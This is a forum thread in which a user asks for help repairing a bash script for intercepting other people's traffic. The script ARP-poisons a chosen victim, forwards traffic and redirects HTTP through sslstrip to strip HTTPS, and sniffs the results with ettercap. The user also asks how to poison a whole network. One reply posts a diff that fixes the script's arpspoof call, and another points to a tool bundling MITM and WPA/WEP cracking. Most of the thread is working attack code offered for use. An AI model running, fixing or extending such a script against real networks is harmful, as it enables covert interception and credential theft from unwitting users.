SSl Sniff Script Repair

Found the following script. Have been unable to get it to run.
The error seems to be with the Arpspoof area.

Should I replace it with Ettercap, or well...what do you guys think?

Also, it is unclear how to ARP the entire network. I put in // // for target and the router IP for gateway. not sure if that would work being that the arp spoof fails.

I would appreciate any feedback.

Code:

#!/bin/bash # # Synopsis: A program to sniff traffic in an SSL connection # Author: thims (thims DOT local AT gmail DOT com) # Version: 0.3 # Date: 20091107 # Comments: # ToDO: # leave blank simply here for coding style victim= gateway= sslPort=10000 etterConf=/etc/etter.conf # print help function help() { cat << EOF Usage: $0 [args] host -h, --help - Print this help and exit -i. --iface - Interface to use -e, --etconf - Location of etter.conf on the filesystem -v, --victim - IP address of desired host -g, --gateway - IP address of network gateway -s, --sslport - Desired port for sslstrip EOF } # echo supplied argument and die function die() { if [ -n "$1" ] ;then echo "$1" fi exit 1 } # nohup wrapper to check if specified program will execute correctly function noHup() { cmd="$1" nohup $cmd > /dev/null &> /dev/null & sleep 5 # here simply to handle sslstrip because it is ran by python it throws off pidof if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') else pid=$(pidof $(echo "$1" | awk -F" " '{print $1}')) fi if [ -z "$pid" ] ;then return 1 else return 0 fi } # poison the arp function spoofMac() { echo -n "Poisoning the victim...." noHup "arpspoof "$iface" -t "$victim" "$gateway"" if [ $? -gt 0 ] ;then die "Error: could not initiate arpspoof. Dieing..." fi echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run echo "Ok" } # intercept the SSL cert function sslInit() { echo -n "Setting up SSL intercept...." echo 1 > /proc/sys/net/ipv4/ip_forward # ensure that ip_forward is set while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ] do echo 1 > /proc/sys/net/ipv4/ip_forward done iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort" noHup "sslstrip -a -f -k -l "$sslPort"" if [ $? -gt 0 ] ;then die "Error: could not initiate sslstrip. Dieing..." fi echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run echo "Ok" } # capture the responses function capture() { # edit ettercap.conf for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}') do sed -i $linNum's/#//' "$etterConf" done echo -n "Starting to sniff...." ettercap -T -q "$iface" } # clean up enviroment function cleanUp() { echo "Cleaning up...." echo -n "Closing SSL proxy...." kill $(cat /var/run/sslsniff.sslstrip.run) rm /var/run/sslsniff.sslstrip.run echo "Ok" echo -n "Unpoisoning the victim...." kill -n 2 $(cat /var/run/sslsniff.arpspoof.run) rm /var/run/sslsniff.arpspoof.run echo "Ok" echo -n "Removing iptables rule and ip_forwarding...." iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort" echo 0 > /proc/sys/net/ipv4/ip_forward echo "Ok" # return etter.conf to the state it was found in echo -n "Returning etter.conf to the configuration we found it with...." for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}') do sed -i $linNum's/^/#/' "$etterConf" done echo "Ok" echo "Have a nice day!" } # initialize the whole shebang function initialize() { if [ -z "$victim" ] || [ -z "$gateway" ] ;then help echo die "Error: a syntactical one" else echo "Enviroment details:" echo " Victim: " "$victim" " Ok!" echo " Gateway/Router: " "$gateway" " OK!" echo " Interface: " "$iface" " OK!" echo " SSLStrip port: " "$sslPort" " OK!" spoofMac sslInit capture cleanUp fi } # some CLI ARGS? while [ $# -gt 0 ] do case "$1" in "-h"|"--help") help die ;; "-v"|"--victim") victim="$2" ;; "-g"|"--gw") gateway="$2" ;; "-s"|"--sslport") sslPort="$2" ;; "-i"|"--iface") if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then die "Error: interface "$2" does not exist!" else iface="-i $2" fi ;; "-e"|"--etconf") if [ ! -e "$2" ] ;then die "Error: specified ettercap conf does not exist!" else etterConf="$2" fi ;; '') help echo die "Error: a syntactical one" ;; -*) help echo die "Error: a syntactical one" ;; esac shift done # main loop initialize

Re: SSl Sniff Script Repair

Where did you find this script at?

Re: SSl Sniff Script Repair

There are more errors in this script that just the arpspoof section, but this will get you past that

Code:

--- sslsniffer.sh.orig 2011-05-12 00:09:29.123538197 -0400 +++ sslsniffer.sh 2011-05-12 00:10:37.273557277 -0400 @@ -7,6 +7,7 @@ # Comments: # ToDO: +set -x # leave blank simply here for coding style victim= @@ -57,7 +58,7 @@ # poison the arp function spoofMac() { echo -n "Poisoning the victim...." - noHup "arpspoof "$iface" -t "$victim" "$gateway"" + noHup "arpspoof -i "$iface" -t "$victim" "$gateway"" if [ $? -gt 0 ] ;then die "Error: could not initiate arpspoof. Dieing..." fi @@ -164,7 +165,7 @@ if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then die "Error: interface "$2" does not exist!" else - iface="-i $2" + iface="$2" fi ;; "-e"|"--etconf")

Re: SSl Sniff Script Repair

Archangel, I found the script in these forums (i think). I thought I made a reference but apparently not.

Re: SSl Sniff Script Repair

You can try a script called WiPhire which works perfectly, it has an option for MITM using SSLStrip as well as a few others like crack WPA and WEP. I'm not sure if it runs on BT5 but you can give it a shot or just use it to check out the code. It's way easier than typing all the lines in especially when you already know them and their meanings.
http://sourceforge.net/projects/wiphire/